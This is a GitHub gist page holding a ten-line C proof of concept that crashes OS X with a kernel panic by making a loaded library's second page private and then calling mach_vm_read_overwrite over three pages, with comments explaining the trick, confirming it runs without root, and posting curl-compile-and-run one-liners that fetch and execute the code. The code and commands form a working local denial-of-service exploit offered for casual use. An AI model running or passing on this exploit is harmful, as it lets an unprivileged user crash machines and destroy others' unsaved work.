Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Kernel panic in latest OS X in 10 lines of C
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>
int
main (int argc, char * argv[])
{
volatile char * library;
const mach_vm_size_t page_size = getpagesize ();
const mach_vm_size_t buffer_size = 3 * page_size;
char buffer[buffer_size];
mach_vm_size_t result_size;
library = (char *) _dyld_get_image_header (1);
mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
library[page_size]++;
library[page_size]--;
result_size = 0;
mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);
return 0;
}
@sbose78

This comment has been minimized.

Show comment Hide comment
@sbose78

sbose78 Feb 20, 2015

Some code comments would help :(

sbose78 commented Feb 20, 2015

Some code comments would help :(

@evilsocket

This comment has been minimized.

Show comment Hide comment
@evilsocket

evilsocket Feb 20, 2015

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writings on that offset and then tries to read the first 3 pages of the image into a buffer.

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writings on that offset and then tries to read the first 3 pages of the image into a buffer.

@oleavr

This comment has been minimized.

Show comment Hide comment
@oleavr

oleavr Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

oleavr commented Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

@kainz

This comment has been minimized.

Show comment Hide comment
@kainz

kainz Feb 21, 2015

Does this require root to run?

kainz commented Feb 21, 2015

Does this require root to run?

@jhorowitz

This comment has been minimized.

Show comment Hide comment
@jhorowitz

jhorowitz Feb 21, 2015

@kainz No

@workmanw

This comment has been minimized.

Show comment Hide comment
@workmanw

workmanw Feb 21, 2015

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash
@Bilge

This comment has been minimized.

Show comment Hide comment
@Bilge

Bilge Feb 21, 2015

library[page_size]++;
library[page_size]--; 

Am I being trolled?

Bilge commented Feb 21, 2015

library[page_size]++;
library[page_size]--; 

Am I being trolled?

@bcho

This comment has been minimized.

Show comment Hide comment
@bcho

bcho Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr 's comment.

bcho commented Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr 's comment.

@CoolOppo

This comment has been minimized.

Show comment Hide comment
@CoolOppo

CoolOppo Feb 21, 2015

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

@steakknife

This comment has been minimized.

Show comment Hide comment
@steakknife

steakknife Feb 23, 2015

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out
@iskl

This comment has been minimized.

Show comment Hide comment
@iskl

iskl Apr 5, 2015

The code do works!!! Awesome!!! Fantastic!!! Unreal!!!

iskl commented Apr 5, 2015

The code do works!!! Awesome!!! Fantastic!!! Unreal!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment